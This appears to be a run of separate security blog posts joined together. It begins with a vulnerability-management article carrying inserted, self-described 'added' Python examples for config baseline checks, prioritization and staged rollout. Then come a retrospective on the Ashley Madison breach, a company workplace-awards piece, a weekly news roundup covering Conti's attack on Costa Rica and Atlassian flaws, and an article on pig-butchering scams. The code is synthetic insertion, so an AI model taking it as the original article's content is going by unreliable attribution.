  • Misconfiguration: Regardless of whether we talk about the operating system, user applications, or cloud services, all can be exposed due to misconfigurations. The 2022 Cloud Security Report from Check Point confirms that 27% of organizations experienced a security incident in their public cloud infrastructure, while 23% of those were caused due to cloud misconfigurations.
  • Zero-Day Vulnerabilities: A zero-day vulnerability is a vulnerability in a system that has been recently discovered but for which the vendor has yet to provide a mitigation. When new zero-day vulnerabilities are discovered, we often see an increase in large-scale campaigns by threat actors. Examples are global campaigns like WannaCry, NotPetya, Kaseya, or SolarWinds.

Now that we understand what vulnerabilities are, let’s look at the difference between vulnerabilities and exploits:

  • Vulnerability: A vulnerability is an unexpected design flaw that, in theory, could be exploited.
  • Exploit: An exploit is a series of activities someone performs that exploits a vulnerability to perform unwanted and unauthorized actions.

In the context of risk and exposure management, it is therefore essential to understand both an organization’s vulnerabilities and how they can be exploited. This determines how fast an organization should respond to a newly discovered vulnerability in its environment. This is precisely where traditional vulnerability management solutions fail: they often miss the link between the vulnerability and the exploit.

That is why modern vulnerability management solutions are converging into Extended Detection and Response (XDR) platforms, which allow the vendor to provide an organization with real-time risk and exposure assessments by correlating identified vulnerabilities with telemetry from their Identity Threat Detection and Response (ITDR) and Endpoint Detection and Response (EDR) capabilities.

4. Leverage Security Posture Management

Naturally, after identifying the risk and exposure to vulnerabilities, the next step is determining how an organization can reduce the exposed risk. In this case, organizations are essentially looking to understand how they can remediate the issue.

To achieve this, we need to correlate the confirmed issue and the current configuration state of the impacted asset. This will allow the organization to find the best path forward.

That is why modern vulnerability management solutions leverage security posture management capabilities, which compare the current state against best practices and provide the organization with descriptive remediation recommendations.
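To make the continuous assessment of step 2 and the posture comparison of step 4 concrete, here is an added Python example (not code from this article or from any SentinelOne product). It parses a host’s current sshd_config, compares each setting with a hardening baseline, and emits findings that carry a remediation recommendation. The configuration text, the baseline rules and the daemon defaults are constructed for illustration; the expected values echo common SSH hardening guidance but are not quoted from any specific CIS benchmark.

```python
"""Configuration baseline check with remediation recommendations.

Added example (not code from the article, SentinelOne, or any benchmark
publisher). The sshd_config text and the baseline rules are constructed
for illustration; expected values echo common SSH hardening guidance but
are not quoted from a specific CIS benchmark.
"""
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: the current sshd_config of one host (not a real host).
SAMPLE_SSHD_CONFIG = """\
# constructed sample
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6
X11Forwarding no
"""


@dataclass(frozen=True)
class BaselineRule:
    key: str          # sshd_config keyword (matched case-insensitively)
    expected: str     # value the baseline requires
    default: str      # value sshd assumes when the keyword is absent (illustrative assumption)
    remediation: str  # what to change, phrased for the ticket


# Constructed baseline, illustrative of a CIS-style hardening checklist.
BASELINE: List[BaselineRule] = [
    BaselineRule("PermitRootLogin", "no", "prohibit-password",
                 "Set 'PermitRootLogin no'; administer via an unprivileged account and sudo."),
    BaselineRule("PasswordAuthentication", "no", "yes",
                 "Set 'PasswordAuthentication no' and deploy SSH keys."),
    BaselineRule("MaxAuthTries", "4", "6",
                 "Set 'MaxAuthTries 4' to limit credential guessing per connection."),
    BaselineRule("X11Forwarding", "no", "no",
                 "Set 'X11Forwarding no' unless X11 is required."),
    BaselineRule("ClientAliveInterval", "300", "0",
                 "Set 'ClientAliveInterval 300' so idle sessions are torn down."),
]


@dataclass(frozen=True)
class Finding:
    key: str
    current: str
    expected: str
    source: str       # "explicit" (set in the file) or "default" (keyword absent)
    remediation: str


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return {keyword_lowercase: value}. Comments and blank lines are skipped;
    as in sshd, the first value seen for a keyword wins."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def assess(settings: Dict[str, str], baseline: List[BaselineRule]) -> List[Finding]:
    """Compare the current state with the baseline and return one Finding per drift.
    A missing keyword is judged by the daemon's default, so "not configured"
    is never mistaken for "compliant"."""
    findings: List[Finding] = []
    for rule in baseline:
        key = rule.key.lower()
        if key in settings:
            current, source = settings[key], "explicit"
        else:
            current, source = rule.default, "default"
        if current.lower() != rule.expected.lower():
            findings.append(Finding(rule.key, current, rule.expected, source, rule.remediation))
    return findings


def assess_text(text: str, baseline: List[BaselineRule] = BASELINE) -> List[Finding]:
    """Convenience wrapper: parse raw config text and assess it against the baseline."""
    return assess(parse_sshd_config(text), baseline)


if __name__ == "__main__":
    for f in assess_text(SAMPLE_SSHD_CONFIG):
        print(f"{f.key}: current={f.current!r} ({f.source}), expected={f.expected!r}")
        print(f"  remediation: {f.remediation}")
```

Run on a schedule against every managed host, this is the skeleton of continuous assessment: the same check that a consultant would perform once a year runs after every change, and because absent keywords are scored by their defaults, a host that simply never set `ClientAliveInterval` is reported as drifted rather than silently passing.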

5. Adopt Automatic Work Prioritization

While the previous step is focused on automatically identifying the remediation requirements, the step of automatic work prioritization helps provide the bigger picture.

In the end, there will always be vulnerabilities, and there will always be things we need to do to reduce the attack surface; therefore, we need to prioritize the work by clearly understanding the exposed risk.

Technology can help to identify vulnerabilities, provide remediation recommendations, and to some extent, automatically prioritize work based on possible impact; however, security teams know their environment best and play a vital role in prioritizing required work based on their deep knowledge of their environment.
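Steps 3 and 5 together describe a ranking that combines the vulnerability, the exploit, the asset’s exposure and human-supplied context. The following Python example is added here to show such a ranking in working code; it is not code from this article or from any SentinelOne product. The assets, findings, `VULN-`-style identifiers and weighting factors are all constructed for illustration, and the exploit and telemetry flags stand in for signals a real program would pull from its threat-intelligence feeds and XDR telemetry.

```python
"""Exposure-aware vulnerability prioritization.

Added example (not code from the article or any SentinelOne product). The
findings, assets, identifiers and weighting factors are constructed for
illustration; real programs take exploit availability and exploitation
telemetry from their own threat-intelligence and XDR sources.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Asset:
    name: str
    internet_facing: bool
    business_criticality: int  # 1 (low) .. 5 (crown jewel); set by the security team, not inferred


@dataclass(frozen=True)
class Vulnerability:
    asset: str
    vuln_id: str                 # placeholder identifiers below, not real CVEs
    cvss: float                  # 0.0 .. 10.0 base severity from the scanner
    exploit_public: bool         # threat intel: a working exploit is available
    exploitation_observed: bool  # EDR/ITDR telemetry: related activity seen on this asset


# Constructed inventory (human-supplied context) and constructed scanner findings.
ASSETS: Dict[str, Asset] = {
    "web-01": Asset("web-01", internet_facing=True, business_criticality=5),
    "hr-db": Asset("hr-db", internet_facing=False, business_criticality=4),
    "kiosk-07": Asset("kiosk-07", internet_facing=False, business_criticality=1),
}
FINDINGS: List[Vulnerability] = [
    Vulnerability("web-01", "VULN-0001", 7.5, exploit_public=True, exploitation_observed=False),
    Vulnerability("hr-db", "VULN-0002", 9.8, exploit_public=False, exploitation_observed=False),
    Vulnerability("kiosk-07", "VULN-0003", 6.5, exploit_public=True, exploitation_observed=True),
    Vulnerability("web-01", "VULN-0004", 4.3, exploit_public=False, exploitation_observed=False),
]


def priority_score(v: Vulnerability, a: Asset) -> float:
    """Relative ranking score (deliberately not bounded to 10).

    Severity is the base; the multipliers encode the article's point that an
    exploitable or actively exploited flaw on an exposed, important asset
    outranks a theoretical one. The weights are assumptions for illustration."""
    score = v.cvss
    if v.exploit_public:
        score *= 1.5          # a real exploit exists: no longer theoretical
    if v.exploitation_observed:
        score *= 2.0          # telemetry shows it is being used here: act now
    if a.internet_facing:
        score *= 1.3          # reachable without prior foothold
    score *= 0.6 + 0.1 * a.business_criticality   # 0.7 .. 1.1, human judgement
    return round(score, 2)


def tier(score: float) -> str:
    """Map the score onto work-queue tiers (thresholds are illustrative)."""
    if score >= 15:
        return "P1"
    if score >= 9:
        return "P2"
    if score >= 4:
        return "P3"
    return "P4"


def prioritize(findings: List[Vulnerability], assets: Dict[str, Asset]) -> List[Tuple[str, float, str]]:
    """Return (vuln_id, score, tier) sorted highest first.

    A finding on an asset missing from the inventory is scored as if the asset
    were internet-facing and critical: an unknown asset is itself an exposure,
    which is the point of step 1 (real-time surface discovery)."""
    unknown = Asset("<unknown>", internet_facing=True, business_criticality=5)
    ranked = []
    for v in findings:
        s = priority_score(v, assets.get(v.asset, unknown))
        ranked.append((v.vuln_id, s, tier(s)))
    ranked.sort(key=lambda r: r[1], reverse=True)
    return ranked


if __name__ == "__main__":
    for vuln_id, score, t in prioritize(FINDINGS, ASSETS):
        print(f"{t} {score:6.2f} {vuln_id}")
```

With the constructed data the CVSS 9.8 finding on the internal database ranks below a 7.5 with a public exploit on the internet-facing web server and below a 6.5 that telemetry shows being exploited on a kiosk; that inversion of the raw severity order is exactly the vulnerability-to-exploit link the text says traditional tooling misses. The criticality factor is where the security team’s knowledge of its own environment enters the ranking.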

6. Use Pilot Groups To Test Remediation

One of the biggest challenges in vulnerability management is often remediation itself. Many recommended activities target the entire digital estate directly, even though some remediation steps could fundamentally change the enterprise architecture. Organizations are therefore often reluctant to make these changes for fear of breaking functioning business processes and systems, and of increasing help desk support volume. For most vulnerabilities, it is recommended that the remediation activity is first targeted at defined pilot groups before rolling it out across the fleet.

7. Implement Automatic Remediation

Once the IT and security team is confident with the implemented remediation in a pilot group, it is time to roll out the remediation across the digital estate gradually. At this point, the risk of breaking functioning business processes and systems should be minimal.
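Steps 6 and 7 form one procedure: apply the change to a pilot group, confirm it did no harm, then widen the rollout gradually. The Python below is an added example of that gate, not code from this article or from any SentinelOne product. The rings, hostnames and simulated outcomes are constructed; in a real deployment the apply step would drive the endpoint-management tool and the health check would read actual telemetry rather than a lookup table.

```python
"""Ring-based remediation rollout with a pilot gate.

Added example (not code from the article or any SentinelOne product). The
rings, hostnames and simulated outcomes are constructed; in practice the
apply step would call the configuration or endpoint-management tool and the
health check would read real telemetry.
"""
from typing import Callable, Dict, List

# Constructed rollout plan: a small pilot first, then progressively larger rings.
RINGS: Dict[str, List[str]] = {
    "pilot": ["it-ws-01", "it-ws-02", "it-ws-03"],
    "ring-1": ["fin-ws-01", "fin-ws-02", "fin-ws-03", "fin-ws-04", "fin-ws-05"],
    "ring-2": [f"ops-ws-{i:02d}" for i in range(1, 11)],
}

# Constructed simulation of what the change does on each host; any host not
# listed applies cleanly. Two finance workstations break on the change.
SIMULATED_OUTCOMES: Dict[str, str] = {"fin-ws-02": "failed", "fin-ws-04": "failed"}


def simulated_apply(host: str, outcomes: Dict[str, str] = SIMULATED_OUTCOMES) -> bool:
    """Stand-in for applying the remediation and checking host health afterwards.
    Returns True when the host is healthy after the change."""
    return outcomes.get(host, "ok") == "ok"


def staged_rollout(rings: Dict[str, List[str]],
                   apply_fn: Callable[[str], bool],
                   max_failure_rate: float = 0.2) -> List[dict]:
    """Apply the remediation ring by ring, in the order given, and stop before
    the next ring if the failure rate in the current one exceeds
    max_failure_rate. Returns one record per ring attempted; a record with
    halted=True is always the last one, so the untouched rings are visible
    by their absence."""
    log: List[dict] = []
    for ring_name, hosts in rings.items():
        failed = [h for h in hosts if not apply_fn(h)]
        rate = len(failed) / len(hosts) if hosts else 0.0
        record = {
            "ring": ring_name,
            "hosts": len(hosts),
            "failed": failed,
            "failure_rate": rate,
            "halted": rate > max_failure_rate,
        }
        log.append(record)
        if record["halted"]:
            break   # leave the remaining rings untouched until the failures are understood
    return log


if __name__ == "__main__":
    for rec in staged_rollout(RINGS, simulated_apply):
        status = "HALTED" if rec["halted"] else "ok"
        print(f"{rec['ring']}: {rec['hosts']} hosts, failed={rec['failed']} [{status}]")
```

The pilot here passes cleanly, the first broad ring fails on two of five hosts and the rollout stops before touching the ten operations workstations; that is the behaviour the text asks for, with the blast radius of a bad change bounded by the ring size rather than by the whole estate.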

Artificial Intelligence Paired With Human Ingenuity

We know from experience that there still exists a divide between AI and humans regarding decision-making. We should never expect AI to be intuitive, ethical, or strategic. These are areas where we inevitably still need humans in the loop, and where human intellectual capital excels. We also must realize that we should never expect a human operator to be as efficient or effective at tasks such as hunting through large datasets looking for anomalies, summarizing billions of events to determine baseline trends, or testing what-if hypotheses. This is the realm where AI has a clear advantage.

AI brings the ability to gather and analyze large quantities of complex data, sifting through oceans of information in a fraction of the time it would take a group of humans. That means the data is still timely when it is analyzed, whereas if humans were doing it, an attack might be discovered weeks after it entered the organization. AI turns data from a backward-looking record into the impetus for strategic decision-making and action.

Humans bring two special skills to the table. First, they can take the information machines put forward and apply intellect. They understand the context of multiple pieces of data threaded together and are much better at deciphering the subtle clues that unearth an attack.

Decision-making needs to coordinate between humans and AI, with the workload split adequately along these lines. Either side should be empowered to make decisions that affect users, devices, and applications in the real world while balancing the risks and rewards associated with each.

Conclusion

There will always be vulnerabilities, the threat landscape will continue to evolve, and the attack surface will continue to increase. As defenders, we are at a pivotal moment where we need to modernize our approach to vulnerability management. Periodic, manual, and siloed risk assessments are no longer efficient or scalable.

Just as we shifted from traditional signature-based security solutions to behavioral-based detection and response methodologies, so we need to modernize our approach to vulnerability management.

To learn more about how SentinelOne can help with real-time asset discovery and vulnerability management, visit Singularity Ranger.


A Retrospective on the 2015 Ashley Madison Breach

It’s been seven years since the online cheating site AshleyMadison.com was hacked and highly sensitive data about its users posted online. The leak led to the public shaming and extortion of many Ashley Madison users, and to at least two suicides. To date, little is publicly known about the perpetrators or the true motivation for the attack. But a recent review of Ashley Madison mentions across Russian cybercrime forums and far-right websites in the months leading up to the hack revealed some previously unreported details that may deserve further scrutiny.

As first reported by KrebsOnSecurity on July 19, 2015, a group calling itself the “Impact Team” released data sampled from millions of users, as well as maps of internal company servers, employee network account information, company bank details and salary information.

The Impact Team said it decided to publish the information because ALM “profits on the pain of others,” and in response to alleged lies that Ashley Madison parent firm Avid Life Media allegedly told its customers about a service that allows members to completely erase their profile information for a $19 fee.

According to the hackers, although the “full delete” feature that Ashley Madison advertises promised “removal of site usage history and personally identifiable information from the site,” users’ purchase details — including real name and address — aren’t actually scrubbed.

“Full Delete netted ALM $1.7mm in revenue in 2014. It’s also a complete lie,” the hacking group wrote. “Users almost always pay with credit card; their purchase details are not removed as promised, and include real name and address, which is of course the most important information the users want removed.”

A snippet of the message left behind by the Impact Team.

The Impact Team said ALM had one month to take Ashley Madison offline, along with a sister property called Established Men. The hackers promised that if a month passed and the company did not capitulate, it would release “all customer records, including profiles with all the customers’ secret sexual fantasies and matching credit card transactions, real names and addresses, and employee documents and emails.”

Exactly 30 days later, on Aug. 18, 2015, the Impact Team posted a “Time’s up!” message online, along with links to 60 gigabytes of Ashley Madison user data.

AN URGE TO DESTROY ALM

One aspect of the Ashley Madison breach that’s always bothered me is how the perpetrators largely cast themselves as fighting a crooked company that broke their privacy promises, and how this narrative was sustained at least until the Impact Team decided to leak all of the stolen user account data in August 2015.

Granted, ALM had a lot to answer for. For starters, after the breach it became clear that a great many of the female Ashley Madison profiles were either bots or created once and never used again. Experts combing through the leaked user data determined that fewer than one percent of the female profiles on Ashley Madison had been used on a regular basis, and the rest were used just once — on the day they were created. On top of that, researchers found 84 percent of the profiles were male.

But the Impact Team had to know that ALM would never comply with their demands to dismantle Ashley Madison and Established Men. In 2014, ALM reported revenues of $115 million. There was little chance the company was going to shut down some of its biggest money machines.

Hence, it appears the Impact Team’s goal all along was to create prodigious amounts of drama and tension by announcing the hack of a major cheating website, and then letting that drama play out over the next few months as millions of exposed Ashley Madison users freaked out and became the targets of extortion attacks and public shaming.

Robert Graham, CEO of Errata Security, penned a blog post in 2015 concluding that the moral outrage professed by the Impact Team was pure posturing.

“They appear to be motivated by the immorality of adultery, but in all probability, their motivation is that #1 it’s fun and #2 because they can,” Graham wrote.

Per Thorsheim, a security researcher in Norway, told Wired at the time that he believed the Impact Team was motivated by an urge to destroy ALM with as much aggression as they could muster.

“It’s not just for the fun and ‘because we can,’ nor is it just what I would call ‘moralistic fundamentalism,’” Thorsheim told Wired. “Given that the company had been moving toward an IPO right before the hack went public, the timing of the data leaks was likely no coincidence.”

NEO-NAZIS TARGET ASHLEY MADISON CEO

As the seventh anniversary of the Ashley Madison hack rolled around, KrebsOnSecurity went back and looked for any mentions of Ashley Madison or ALM on cybercrime forums in the months leading up to the Impact Team’s initial announcement of the breach on July 19, 2015. There wasn’t much, except a Russian guy offering to sell payment and contact information on 32 million AshleyMadison users, and a bunch of Nazis upset about a successful Jewish CEO promoting adultery.

Cyber intelligence firm Intel 471 recorded a series of posts by a user with the handle “Brutium” on the Russian-language cybercrime forum Antichat between 2014 and 2016. Brutium routinely advertised the sale of large, hacked databases, and on Jan. 24, 2015, this user posted a thread offering to sell data on 32 million Ashley Madison users:

“Data from July 2015
Total ~32 Million contacts:
full name; email; phone numbers; payment, etc.”

It’s unclear whether the postdated “July 2015” statement was a typo, or if Brutium updated that sales thread at some point. There is also no indication whether anyone purchased the information. Brutium’s profile has since been removed from the Antichat forum.

Flashpoint is a threat intelligence company in New York City that keeps tabs on hundreds of cybercrime forums, as well as extremist and hate websites. A search in Flashpoint for mentions of Ashley Madison or ALM prior to July 19, 2015 shows that in the six months leading up to the hack, Ashley Madison and its then-CEO Noel Biderman became a frequent subject of derision across multiple neo-Nazi websites.

On Jan. 14, 2015, a member of the neo-Nazi forum Stormfront posted a lively thread about Ashley Madison in the general discussion area titled, “Jewish owned dating website promoting adultery.”

On July 3, 2015, Andrew Anglin, the editor of the alt-right publication Daily Stormer, posted excerpts about Biderman from a story titled, “Jewish Hyper-Sexualization of Western Culture,” which referred to Biderman as the “Jewish King of Infidelity.”

On July 10, a mocking montage of Biderman photos with racist captions was posted to the extremist website Vanguard News Network, as part of a thread called “Jews normalize sexual perversion.”

“Biderman himself says he’s a happily married father of two and does not cheat,” reads the story posted by Anglin on the Daily Stormer. “In an interview with the ‘Current Affair’ program in Australia, he admitted that if he found out his own wife was accessing his cheater’s site, ‘I would be devastated.’”

The leaked AshleyMadison data included more than three years’ worth of emails stolen from Biderman. The hackers told Motherboard in 2015 they had 300 GB worth of employee emails, but that they saw no need to dump the inboxes of other company employees.

Several media outlets pounced on salacious exchanges in Biderman’s emails as proof he had carried on multiple affairs. Biderman resigned as CEO on Aug. 28, 2015. The last message in the archive of Biderman’s stolen emails was dated July 7, 2015 — almost two weeks before the Impact Team would announce their hack.

Biderman told KrebsOnSecurity on July 19, 2015 that the company believed the hacker was some type of insider.

“We’re on the doorstep of [confirming] who we believe is the culprit, and unfortunately that may have triggered this mass publication,” Biderman said. “I’ve got their profile right in front of me, all their work credentials. It was definitely a person here that was not an employee but certainly had touched our technical services.”

Certain language in the Impact Team’s manifesto seemed to support this theory, such as the line: “For a company whose main promise is secrecy, it’s like you didn’t even try, like you thought you had never pissed anyone off.”

But despite ALM offering a belated $500,000 reward for information leading to the arrest and conviction of those responsible, to this day no one has been charged in connection with the hack.

Fortune Names SentinelOne a Top Workplace for Millennials | Sentinels Share Why They Agree

Over 400K millennials have weighed in to determine Fortune’s Best Workplaces for Millennials in 2022 – and SentinelOne is proud to be named a leading employer for millennials! With nearly 54% of our team born between 1981 and 1997, millennials are a critical part of our workforce.

We spoke to a few of our millennial teammates around the globe to understand what they liked best about the SentinelOne workplace culture. “People” were at the top of the favorites list, which also included the ability to make an impact working on leading-edge tech, and creative offerings that support mental health and wellbeing. They also value our benefits aligned to the modern, evolving family, including the gender-neutral parental leave program and hybrid working model.

Mary Pascual, Incident Response Technical Account Manager

Mary joined SentinelOne earlier this year. Prior to joining, Mary was in cyber threat operations and was familiar with our technology, describing it as the “best in the market.” She kept a close eye on job openings at SentinelOne and applied when she saw a match for her skill set.

“Being in cybersecurity, I was familiar with the products out there,” said Mary. “After reading about the SentinelOne technology, I realized the potential. At the time I was doing manual threat hunting, and it was very tedious. I knew first-hand why the demand would be so high.”

Based in Singapore, Mary works to educate Incident Response Partners on the features and benefits of our platform.

“My job is to ensure that the Incident Response partners know how to best assist customers when there’s a breach,” said Mary. “The goal is always to have the security team extract what they need as quickly as they can and mitigate the issue.”

The tech is what attracted Mary to SentinelOne, but ask her what she loves best about working with the team, and her answers are more about the team than the amazing tech they develop.

“My team is like family,” said Mary. “I feel so valued, and I know I am making an impact. My managers and my teammates acknowledge my effort, and that is very important. We are completely empowered to do our jobs and to me, that’s everything.”

Mary also cited flexibility in her daily schedule and future opportunities for growth as reasons she loves working at SentinelOne. Her advice for others looking to break into cybersecurity is simple – learn all that you can and then go learn some more.

“Start by learning and knowing the fundamentals in networking and security,” said Mary. “Read books on cybersecurity. Invest in yourself by going to training and conferences. Once you get there, don’t just learn – network and have fun too!”

Ronnie Press, Talent Tools and Business Analyst

Ronnie has been with SentinelOne for almost two years. Ronnie enables the Talent Acquisition organization with data they need to effectively and efficiently recruit during hypergrowth.

“Data helps tell the story,” said Ronnie. “My team is heads down and completely focused on hiring. I provide the data that helps inform decisions, identify opportunities and celebrate accomplishments.”

SentinelOne is quickly approaching 2K employees, 500 of which were hired since February of this year. Ronnie describes the culture as supportive and collaborative, even with the rapid growth.

“We are such a force in the cybersecurity industry,” said Ronnie. “To be able to become a public company, hire so many people and retain a start-up soul is a huge accomplishment.”

“The company is growing fast, and there’s a huge opportunity for everyone to make an impact,” said Ronnie. “Our culture is so supportive, and it’s by far the most remote-friendly organization I’ve ever worked for.”

Ronnie attributes his overall job satisfaction to the spirit of the team he works on.

“Connection with colleagues is a huge influence on your success,” said Ronnie. “People are even more important than money, industry or company prestige. That stuff matters, but it’s not the most important thing.”

Ronnie also cites work/life balance and ability to work remotely as the top reasons he enjoys working at SentinelOne. He recently relocated to San Diego to be closer to friends and enjoy outdoor activities including playing in a basketball league and hiking.

Meriya Thomas, Staff Software Engineer

Meriya joined SentinelOne just over a year ago and cites the amazing energy for our award-winning culture.

“The positive energy can actually be felt throughout this company,” said Meriya. “It’s truly inspiring. We are open and respectful in all of our interactions. We also have a unique way of trusting each other and being open to different ideologies and opinions.”

Meriya makes her home in Chicago with her husband and 3-year-old daughter. She is expecting her second child and is very grateful for SentinelOne’s gender-neutral parental leave, which provides 16 weeks to all Sentinels regardless of gender, birthing status or sexual orientation.

“Time with family is so precious right after the baby is born,” said Meriya. “I am very grateful to be able to focus on my growing family without feeling pressure to return too quickly.”

Meriya works on a collaborative global team focusing on user experience. She is proud of how well her team members stay connected across multiple time zones.

“Our communication is seamless,” said Meriya. “We use innovative communication channels to build end-to-end tech docs and have discussions while writing and reviewing code. What amazes me is that we constantly enable each other to work more efficiently.”

Meriya is grateful for her ability to have an impact at work – and at home. She describes 5:30pm as “sacred” when she welcomes her daughter home from school.

“My manager is very respectful of my time, which I really appreciate,” said Meriya. “When my daughter gets home, I rarely need to open my laptop. That time is all about her.”

Meriya is also grateful to SentinelOne for caring for her wellbeing with robust benefit offerings.

“It’s not just work-work-work here,” said Meriya. “SentinelOne cares about my mental and physical well-being. We have fitness challenges and masterclasses on wellbeing that I really enjoy.”

Meriya’s advice to other millennial women in tech – speak out and take advantage of all opportunities to learn and grow.

“Don’t hold back any of your opinions or ideas,” said Meriya. “Keep asking questions and keep learning on the side. Technology is evolving so fast, it’s critical to stay up to date!”

Is SentinelOne a Good Place to Work?

In addition to this Fortune ranking, SentinelOne has received a number of other recent accolades highlighting our best-in-class culture, including:

  • INC. Best Workplaces 2022
  • Fortune Best Workplaces in the Bay Area 2022
  • Best Workplaces in the Netherlands 2022
  • Best Workplaces in the UK 2022
  • Best Workplaces for Wellbeing in the UK 2022
  • The Bay Area’s Best Places To Work 2022
  • Comparably Best Company Outlook 2022
  • Comparably Best Company For Global Culture 2022
  • Comparably Best Company in the Bay Area 2022
  • Comparably Best Company for Career Growth 2022
  • Comparably Best CEOs for Women 2022
  • Comparably Best CEOs for Diversity 2022
  • Comparably Best Sales Team 2022
  • Comparably Best Engineering Team 2022

To learn more about our award-winning culture and job opportunities, visit our careers page.

The Good, the Bad and the Ugly in Cybersecurity – Week 30

The Good

This week, the Justice Department announced that they had disrupted the activities of a group of North Korean state-sponsored threat actors that targeted healthcare facilities in 2021, successfully seizing and returning approximately $500,000 of ransom money to the victims.

In a keynote address at the International Conference on Cyber Security, U.S. Deputy Attorney General Lisa Monaco walked through the two incidents in which a ransomware group affiliated with the North Korean government targeted healthcare organizations based in Colorado and Kansas with Maui ransomware.

According to Monaco, the FBI and DOJ first encountered Maui ransomware during the Kansas-based incident. The state-sponsored threat actors encrypted the Kansas hospital’s servers and left a ransom note warning hospital administrators that the ransom would double if it was not paid in 48 hours.

However, when the hospital paid the ransom to give their patients the care they needed quickly, they also notified the FBI, which worked with the DOJ to trace the ransom payments using tactics from their investigations on the Colonial Pipeline attack. Law enforcement traced the funds back to Chinese money launderers that frequently aid North Korean threat actors in transferring funds and from this discovery, identified relevant breaches with the Colorado-based medical provider and potential victims overseas.

According to the Deputy Attorney General, recovery of the funds and identification of the Maui ransomware strain directly resulted from the Kansas hospital’s rapid disclosure. We hope this major victory encourages other enterprises and organizations to disclose incidents and contribute to ongoing investigations.

The Bad

Researchers have released new information surrounding the Conti ransomware gang’s attack on the Costa Rican government.

A report from investigators broke down each action the threat actors behind Conti ransomware took over five days to compromise Costa Rica’s government.

First, the cybercriminals gained access to the Costa Rican Ministry of Finance’s systems over a VPN connection, using credentials that were exfiltrated from a previous malware attack. After setting up and executing over 10 Cobalt Strike beacons and gaining local network domain administrator access, Conti ransomware operators scanned the Costa Rican government’s network, moved laterally and exfiltrated credentials using Mimikatz. To establish persistence, the threat actors also downloaded Atera’s remote access tool on less active environments before completing data exfiltration.

The Conti gang demanded that the Costa Rican government pay a $10 million ransom, which the gang then doubled after the government declined to pay. Because the Conti operators had successfully targeted multiple government offices, the breach triggered a national emergency that took over a month to remediate and was Conti’s final attack using its current branding. After this attack, the ransomware gang shut down their leak sites, and its members scattered to other groups of threat actors.

In the fallout of Conti’s final operation, we’re left with a sobering reminder that although a ransomware gang can shut down, it’s more than likely that the threat actors and tooling behind these devastating attacks will re-emerge under a new name to target innocent people and organizations again.

The Ugly

This week, Atlassian disclosed three vulnerabilities, two of which are considered critical flaws that impact almost all of their products.

In two security advisories published on July 20th, the popular software firm disclosed “Servlet Filter dispatcher vulnerabilities” that impact users of Bamboo, Bitbucket, Confluence, Crucible, Fisheye, and Jira.

The first critical vulnerability, tracked as CVE-2022-26136, allows threat actors to bypass custom servlet filters that third-party applications use to enforce authentication. Attackers can exploit this vulnerability to trick users into sending a malicious HTTP request which bypasses a servlet filter designed to validate Atlassian’s “Gadget” modules. These HTTP requests are capable of executing arbitrary JavaScript in a victim’s browser.

The second critical vulnerability, CVE-2022-26137, could allow a remote, unauthenticated attacker to invoke additional servlet filters when an application processes requests. Atlassian’s advisory also warned that attackers could bypass servlet filters related to cross-origin resource sharing (CORS) requests and access a vulnerable application using the victim’s permissions.

The final flaw impacts Confluence users. Questions for Confluence, one of the platform’s apps, creates a Confluence user account when a user enables it on Confluence Server or Data Center. This account uses hardcoded credentials and is designed to support cloud migrations. According to Atlassian’s advisory, the hardcoded credentials were leaked on Twitter and an unauthenticated attacker could use the information to access the app’s user account and any content accessible to members of the “confluence-users” group.

While Atlassian discloses more information about these vulnerabilities and rolls out patches, we would urge enterprise customers to follow the mitigation recommendations outlined in the company’s advisories.

Massive Losses Define Epidemic of ‘Pig Butchering’

U.S. state and federal investigators are being inundated with reports from people who’ve lost hundreds of thousands or millions of dollars in connection with a complex investment scam known as “pig butchering,” wherein people are lured by flirtatious strangers online into investing in cryptocurrency trading platforms that eventually seize any funds when victims try to cash out.

The term “pig butchering” refers to a time-tested, heavily scripted, and human-intensive process of using fake profiles on dating apps and social media to lure people into investing in elaborate scams. In a more visceral sense, pig butchering means fattening up a prey before the slaughter.

“The fraud is named for the way scammers feed their victims with promises of romance and riches before cutting them off and taking all their money,” the Federal Bureau of Investigation (FBI) warned in April 2022. “It’s run by a fraud ring of cryptocurrency scammers who mine dating apps and other social media for victims and the scam is becoming alarmingly popular.”

As documented in a series of investigative reports published over the past year across Asia, the people creating these phony profiles are largely men and women from China and neighboring countries who have been kidnapped and trafficked to places like Cambodia, where they are forced to scam complete strangers over the Internet — day after day.

The most prevalent pig butchering scam today involves sophisticated cryptocurrency investment platforms, where investors invariably see fantastic returns on their deposits — until they try to withdraw the funds. At that point, investors are told they owe huge tax bills. But even those who pay the phony levies never see their money again.

The come-ons for these scams are prevalent on dating sites and apps, but they also frequently start with what appears to be a wayward SMS — such as an instant message about an Uber ride that never showed. Or a reminder from a complete stranger about a planned meetup for coffee. In many ways, the content of the message is irrelevant; the initial goal is simply to get the recipient curious enough to respond in some way.

Those who respond are asked to continue the conversation via WhatsApp, where an attractive, friendly profile of the opposite gender will work through a pre-set script that is tailored to their prey’s apparent socioeconomic situation. For example, a divorced, professional female who responds to these scams will be handled with one profile type and script, while other scripts are available to groom a widower, a young professional, or a single mom.

‘LIKE NOTHING I’VE SEEN BEFORE’

That’s according to Erin West, deputy district attorney for Santa Clara County in Northern California. West said her office has been fielding a large number of pig butchering inquiries from her state, but also from law enforcement entities around the country that are ill-equipped to investigate such fraud.

“The people forced to perpetrate these scams have a guide and a script, where if your victim is divorced say this, or a single mom say this,” West said. “The scale of this is so massive. It’s a major problem with no easy answers, but also with victim volumes I’ve never seen before. With victims who are really losing their minds and in some cases are suicidal.”

West is a key member of REACT, a task force set up to tackle especially complex forms of cyber theft involving virtual currencies. West said the initial complaints from pig butchering victims came early this year.

“I first thought they were one-off cases, and then I realized we were getting these daily,” West said. “A lot of them are being reported to local agencies that don’t know what to do with them, so the cases languish.”

West said pig butchering victims are often quite sophisticated and educated people.

“One woman was a university professor who lost her husband to COVID, got lonely and was chatting online, and eventually ended up giving away her retirement,” West recalled of a recent case. “There are just horrifying stories that run the gamut in terms of victims, from young women early in their careers, to senior citizens and even to people working in the financial services industry.”

In some cases reported to REACT, the victims said they spent days or weeks corresponding with the phony WhatsApp persona before the conversation shifted to investing.

